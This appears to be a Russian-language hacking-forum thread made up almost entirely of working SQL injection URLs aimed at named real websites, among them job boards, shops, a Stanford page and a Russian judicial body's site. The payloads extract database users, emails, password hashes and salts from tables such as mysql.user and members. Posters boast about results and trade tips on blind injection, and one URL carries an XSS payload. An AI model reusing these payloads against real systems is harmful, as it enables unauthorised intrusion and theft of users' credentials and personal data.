http://ru-board.com/new/article.php?sid=-99+union+select+1,2,3,concat(user(),' ','preved'),5,6,7,8,9,10/*
http://job.ukr.net/viewvac/view_IDvac.php?vid='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,email,password,19,20,21,22,23,24,25,26,27,28,29,30,31+from+members+limit+1000,1/* мемберов с пассами не меньше тысячи О_о
http://daninvest.by/id_3/product.php?id=5555%20union%20select%201,DATABASE(),3,4,5,6,7,8/* http://www.advance-acoustic.com/fr-product.php?id=-4%20union%20select%201,2,3,4,DATABASE(),6,7,3,8,9,10/* http://www.puppetshowbooks.com/product.php?id=-5' http://www.standard.md/product.php?l=ro&id=-5'%20union%20select%201,table_name%20from+INFORMATION_SCHEMA.TABLES+limit+3,4/*
PHP: http://www.worstpreviews.com/review.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40/*
http://www.splav.kharkov.com/mat_start.php?name_id=-1+union+select+CHAR(207,208,197,194,197,196,32,204,197,196,194,197,196,33)/* СтЭнфорд )) http://art.stanford.edu/bio.php?name_id=-1+union+select+1,2,3,4,user,6,7,8,9,10,11,12,13,14,15,password,17,18,19+from+mysql.user/* http://atvmarket.ru/select.php?cat=-1+union+select+version(),3/* http://www.ecoross.ru/persons.php?name_id=-1+union+select+user(),2,CHAR(198,232,240,232,237,238,226,241,234,232,233,32),4,5,6,7,8,9,10,11,12,13,14/* http://mir-tech.ru/group.php?cat=-1+union+select+CHAR(193,229,199,239,192,237,210,238,194,251,201,32,204,224,195,224,199,232,205,33)/* http://fanats.ru/?n_id=-1+union+select+1,2,email,555,5+from+user+limit+3,3/* http://www.websib.ru/new_detail.php?new_id=-1+union+select+user,password,1+from+mysql.user/*
http://bbq-grilling-recipes.com/recipe.php?recipeid=-1+union+select+0,concat(userid,0x3a,login,0x3a,password,0x3a,email)+from+users+limit+1,1/* ps это двиг. /siteadmin/addad.php?groupid=4
http://filmmakers.node9.org/author.php?name_id=-5'%20union%20select%201,VERSION(),3,4,5,6,0,6,DATABASE(),USER(),9/* помогите с table informations =(
http://www.a1tv.ru/AOpenBands.php?Band=-1+union+select+null,2,concat(memberName,char(58),passwd,char(58),PasswordSalt),4,5+from+smf_members/* A-ONE
http://user.kz/files/cifry.php?sid=23692+union+select+null,null,null,null,null,null,null/* Вот только обидно не выводится не чего из таблици;( P.S. просто из-за внемательности вот только косяк в том, что из базы беруться цифры и потому уже идет генерация ресунка, т.е цифры служат именами для файлов, там уже не чего нельзя сделать!
перебирай http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1,1)))>1) http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1,1)))>100)
НЕ люблю по символьный перебор потом дам тебе имя таблиц, а то не помню куда закул их, потом выложишь http://forum.antichat.ru/thread28658.html
http://www.vkks.ru/second.php?columnValue=-99+union+select+convert(concat(user,0x3a,password)using%20cp1251),2+from+mysql.user/* Высшая квалификационная коллегия судей Российской Федерации
http://www.worthplaying.com/article.php?sid=-1+union+select+1,2,pass,4,name,6,7,111+from+users/* Чють Чють не ф тему но там же http://www.worthplaying.com/user.php?op=userinfo&uname=7'%3Cscript%3Ealert()%3C/script%3E
2Diagen почему же =) можно поля поискать.. не зря таблица юзеры называется.. + раньше был локал инклуд .. сейчас хз http://keep4u.ru/album.php?view=-1'+union+select+1,2,convert(user()+using+cp1251),4+from+users/*
